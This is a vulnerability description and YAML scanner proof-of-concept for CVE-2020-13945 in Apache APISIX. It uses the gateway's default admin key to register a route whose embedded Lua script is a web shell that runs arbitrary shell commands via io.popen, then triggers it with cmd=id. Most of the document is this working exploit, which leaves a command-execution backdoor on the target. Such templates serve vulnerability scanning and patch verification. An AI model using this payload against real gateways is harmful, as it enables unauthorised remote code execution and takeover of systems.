Vulnerability description
Apache APISIX is a high-performance API gateway. When the operator has not set an admin token, or is running with the default configuration file, Apache APISIX accepts the default admin token edd1c9f034335f136f87ad84b625c8f1. An attacker who presents this token in the X-API-KEY header reaches the admin API, and because a route object accepts a script field containing Lua, admin access is enough to register a route that executes arbitrary Lua (and, via io.popen, arbitrary shell commands) inside the gateway worker. The PoC below registers such a route at a random path, then calls it with cmd=id and checks the response for id(1)-style output.
id: CVE-2020-13945

info:
  name: Apache APISIX default admin key vulnerability
  author: 不动明王 exp
  severity: critical
  verified: true
  description: |
    Apache APISIX is a high-performance API gateway. When the operator has not set an admin token, or is running with the default configuration file, Apache APISIX accepts the default admin token edd1c9f034335f136f87ad84b625c8f1. An attacker who presents this token reaches the admin API and, through the script parameter of a route, can inject and execute arbitrary Lua.
  reference:
    - https://github.com/Threekiii/Vulhub-Reproduce/blob/master/Apache%20APISIX%20%E9%BB%98%E8%AE%A4%E5%AF%86%E9%92%A5%E6%BC%8F%E6%B4%9E%20CVE-2020-13945.md

set:
  randstr: randomLowercase(16)

rules:
  r0:
    request:
      method: POST
      path: /apisix/admin/routes
      headers:
        X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
        Content-Type: application/json
      body: |
        {
          "uri": "/{{randstr}}",
          "script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M",
          "upstream": {
            "type": "roundrobin",
            "nodes": {
              "example.com:80": 1
            }
          }
        }
    expression: response.status == 201
  r1:
    request:
      method: GET
      path: /{{randstr}}?cmd=id
    expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)

expression: r0() && r1()